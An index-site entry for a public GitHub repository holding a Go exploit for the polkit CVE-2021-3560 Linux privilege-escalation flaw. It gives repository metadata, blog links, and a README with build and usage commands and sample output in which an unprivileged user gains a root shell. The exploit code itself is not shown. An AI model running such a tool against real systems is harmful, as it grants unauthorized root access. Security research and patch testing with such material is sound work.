Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/RicterZ/CVE-2021-3560-Authentication-Agent

PolicyKit CVE-2021-3560 Exploit (Authentication Agent)
https://github.com/RicterZ/CVE-2021-3560-Authentication-Agent

Last synced: 22 days ago
JSON representation

PolicyKit CVE-2021-3560 Exploit (Authentication Agent)

Host: GitHub
URL: https://github.com/RicterZ/CVE-2021-3560-Authentication-Agent
Owner: RicterZ
License: apache-2.0
Created: 2022-04-29T18:57:30.000Z (over 2 years ago)
Default Branch: main
Last Pushed: 2022-05-02T07:49:01.000Z (over 2 years ago)
Last Synced: 2024-08-05T17:29:34.032Z (4 months ago)
Language: Go
Homepage:
Size: 24.4 KB
Stars: 113
Watchers: 3
Forks: 12
Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

awesome-hacking-lists - RicterZ/CVE-2021-3560-Authentication-Agent - PolicyKit CVE-2021-3560 Exploit (Authentication Agent) (Go)

README

        PolicyKit CVE-2021-3560 Exploit  (Authentication Agent)

====

### Technology Details

Blog posts about this exploit : 

- https://ricterz.me/posts/2022-04-28-a-new-exploit-method-for-cve-2021-3560-polkit-linux-privilege-escalation.txt

- http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation

## Build & Usage

```

nobody@test:/tmp/CVE-2021-3560$ go build

nobody@test:/tmp/CVE-2021-3560$ ./CVE-2021-3560 ./pwnkit.service

=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab ===

pid-267920 - [*] Registering PolicyKit authentication agent ...

...

pid-267915 - [-] Exploit failed, please try again

nobody@test:/tmp/CVE-2021-3560$ ./CVE-2021-3560 ./pwnkit.service

=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab ===

pid-267963 - [*] Registering PolicyKit authentication agent ...

pid-267963 - [*] Authentication agent main loop running ...

pid-267968 - [*] Registering PolicyKit authentication agent ...

pid-267973 - [*] Registering PolicyKit authentication agent ...

pid-267968 - [*] Authentication agent main loop running ...

pid-267973 - [*] Authentication agent main loop running ...

pid-267963 - [*] Starting systemd service 'pwnkit.service' ...

pid-267968 - [*] Enabling systemd unit file '/tmp/pwnkit.service' ...

pid-267973 - [*] Reloading systemd daemon ...

pid-267963 - [+] Received authentication request for action: 'org.freedesktop.systemd1.manage-units'

pid-267963 - [*] Cookie: 100-9b8357901e7f4f4847cbd15a3d191cc4-1-10167c9df23ebe27c57534750f48ef7a

pid-267968 - [+] Received authentication request for action: 'org.freedesktop.systemd1.manage-unit-files'

pid-267968 - [*] Cookie: 101-48273279f75230e86c9ad5df212ee54d-1-a86a81adcf07ad16ab6017a21235da80

pid-267973 - [+] Received authentication request for action: 'org.freedesktop.systemd1.reload-daemon'

pid-267973 - [*] Cookie: 102-3fb9b174b470f5d04881cbfeb16a60d0-1-8a36d3a7f9aca22af0a0f8562f20dbe2

pid-267958 - [+] File exists, popping root shell ...

pwned-5.0# id

uid=65534(nobody) gid=65534(nogroup) euid=0(root) egid=0(root) groups=0(root),65534(nogroup)

```

## License

Apache License